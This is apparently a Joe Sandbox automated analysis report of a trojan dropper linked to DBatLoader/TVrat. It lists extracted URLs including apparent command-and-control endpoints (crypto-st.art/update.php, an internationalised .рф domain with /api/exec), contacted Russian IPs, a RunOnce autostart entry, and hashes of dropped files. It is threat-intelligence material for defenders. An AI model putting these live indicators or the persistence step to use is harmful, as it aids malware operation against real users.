                                                                          http://ocsp.sectigo.com0wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drfalse
                                                                            		high
                                                                            https://id.xn--80akicokc0aablc.xn--p1aillx;ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/soap/encoding/east.exe, 0000000A.00000002.2979445587.0000000000C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.openssl.org/VwjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000361A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.drfalse
                                                                                		high
                                                                                https://id.xn--80akicokc0aaast.exe, 0000000A.00000003.2474490964.000000000608D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUwjpP1EOX0L.exefalse
                                                                                  		high
                                                                                  http://crypto-st.art/update.php?id=142104603&stat=6f83f40;a~8ast.exe, 0000000A.00000003.2973573202.0000000006088000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953370709.000000000608B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443zo-ast.exe, 0000000A.00000003.2746778261.00000000060A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drfalse
                                                                                    		high
                                                                                    https://curl.haxx.se/docs/http-cookies.htmlast.exe, ast.exe, 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drfalse
                                                                                      		high
                                                                                      http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66ln241119_8036.logast.exe, 0000000A.00000003.2888461757.0000000006091000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.borland.com/namespaces/Typesast.exe, 0000000A.00000002.2979445587.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://sectigo.com/CPS0BwjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66uast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.kngstr.com/?PreDefines.ishawjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021F5000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.0000000002345000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://curl.haxx.se/Vast.exe, 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drfalse
                                                                                            		high
                                                                                            https://datatracker.ietf.org/ipr/1914/ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drfalse
                                                                                              		high
                                                                                              http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66wast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://sectigo.com/CPS0CwjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.drfalse
                                                                                                		high
                                                                                                https://sectigo.com/CPS0Dxcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drfalse
                                                                                                  		high
                                                                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443sw.~ast.exe, 0000000A.00000003.2670067675.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66mast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66-80akicokc0aablc.xast.exe, 0000000A.00000003.2947103567.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443ast.exe, 0000000A.00000003.2706718804.00000000060A2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2696026958.00000000060F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1ai03ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443...ast.exe, 0000000A.00000002.2982914474.000000000319B000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2472544479.00000000060BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66cast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66east.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.sqlite.org/copyright.html.wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515695685.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmpfalse
                                                                                                        		high
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai00ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66hast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Yast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1aillllast.exe, 0000000A.00000002.2979445587.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://sectigo.com/CPS0xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drfalse
                                                                                                          		high
                                                                                                          https://www.openssl.org/docs/faq.htmlis-VCJTB.tmp.3.drfalse
                                                                                                            		high
                                                                                                            http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Qast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443...43AWast.exe, 0000000A.00000002.2981320741.0000000002F43000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ait.l;ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1aiDUduast.exe, 0000000A.00000002.2995912080.00000000075CD000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443Wlast.exe, 0000000A.00000003.2787353293.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1aidll03ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:4430wo~ast.exe, 0000000A.00000003.2771015394.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2706718804.00000000060A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443&wast.exe, 0000000A.00000003.2771015394.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2935483270.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2787353293.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn-ast.exe, 0000000A.00000003.2877051123.00000000060A0000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888384413.000000000609F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            212.193.169.65
                                                                                                            		id.xn--80akicokc0aablc.xn--p1aiRussian Federation
                                                                                                            		60329SAFIB-ASRUfalse
                                                                                                            195.19.105.66
                                                                                                            		trs011.xn--80akicokc0aablc.xn--p1aiRussian Federation
                                                                                                            		12389ROSTELECOM-ASRUfalse

                                                                                                            Private

                                                                                                            IP
                                                                                                            127.0.0.1

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1558734
                                                                                                            Start date and time:2024-11-19 18:54:06 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 11m 46s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:13
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:wjpP1EOX0L.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal68.troj.evad.winEXE@15/60@11/3
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 64%
                                                                                                            • Number of executed functions: 45
                                                                                                            • Number of non-executed functions: 113
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtReadFile calls found.
                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                            • VT rate limit hit for: wjpP1EOX0L.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            12:56:10API Interceptor4085x Sleep call for process: ast.exe modified
                                                                                                            17:56:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce asg C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                            17:56:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce asg C:\Users\user\AppData\Roaming\im\ast.exe

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            212.193.169.651.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • id.xn--80akicokc0aablc.xn--p1ai:443http://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                                                                                                            scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • id.xn--80akicokc0aablc.xn--p1ai:80http://id.xn--80akicokc0aablc.xn--p1ai:80/api/exec

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            id.xn--80akicokc0aablc.xn--p1ai1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.65
                                                                                                            1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.65
                                                                                                            scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 185.40.77.244
                                                                                                            scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 185.40.77.244
                                                                                                            XdYKQ6DMdP.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 185.40.77.244
                                                                                                            ZQakIVuCoO.exeGet hashmaliciousTVratBrowse
                                                                                                            • 212.193.169.65
                                                                                                            https://v2-hbconnect.website/order_create_596807_15-07-2022_14-32-02.zipGet hashmaliciousTVratBrowse
                                                                                                            • 212.193.169.65
                                                                                                            5RtqJVIFa3.exeGet hashmaliciousTVratBrowse
                                                                                                            • 45.84.85.231
                                                                                                            hJ9ZjmbY5r.exeGet hashmaliciousDCRat RedLine TVratBrowse
                                                                                                            • 212.193.169.74
                                                                                                            41d9459adfc2174e254616e62e78811abee49d1114f04.exeGet hashmaliciousTVratBrowse
                                                                                                            • 212.193.169.74

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ROSTELECOM-ASRUowari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 178.66.27.29
                                                                                                            owari.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 178.184.109.156
                                                                                                            owari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 212.20.44.177
                                                                                                            owari.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 95.71.223.27
                                                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 178.67.151.64
                                                                                                            botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 92.49.153.194
                                                                                                            botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 94.50.188.105
                                                                                                            botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 95.106.79.112
                                                                                                            xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 95.32.32.59
                                                                                                            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                            • 178.185.126.27
                                                                                                            SAFIB-ASRU1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.65
                                                                                                            1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.68
                                                                                                            scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.68
                                                                                                            scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.68
                                                                                                            XdYKQ6DMdP.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                            • 212.193.169.68
                                                                                                            ZQakIVuCoO.exeGet hashmaliciousTVratBrowse
                                                                                                            • 212.193.169.65
                                                                                                            41d9459adfc2174e254616e62e78811abee49d1114f04.exeGet hashmaliciousTVratBrowse
                                                                                                            • 212.193.169.74
                                                                                                            TbDXlssS18.exeGet hashmaliciousDCRat RedLine TVratBrowse
                                                                                                            • 212.193.169.74
                                                                                                            H9x6j98ecX.exeGet hashmaliciousTVratBrowse
                                                                                                            • 212.193.169.74
                                                                                                            3aJqOjkYXO.exeGet hashmaliciousDCRat RedLine TVratBrowse
                                                                                                            • 212.193.169.74

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            74954a0c86284d0d6e1c4efefe92b521avast_free_antivirus_setup_online.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            avast_free_antivirus_setup_online.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            file.exeGet hashmaliciousCStealerBrowse
                                                                                                            • 212.193.169.65
                                                                                                            https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            #U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65
                                                                                                            26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 212.193.169.65

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dll1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                              1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                        file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                                                                                                                            aesM8nmCM2.exeGet hashmaliciousUnknownBrowse
                                                                                                                              gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2560
                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                • Filename: i7j22nof2Q.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: aesM8nmCM2.exe, Detection: malicious, Browse
                                                                                                                                • Filename: gxjIKuKnu7.exe, Detection: malicious, Browse
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6144
                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
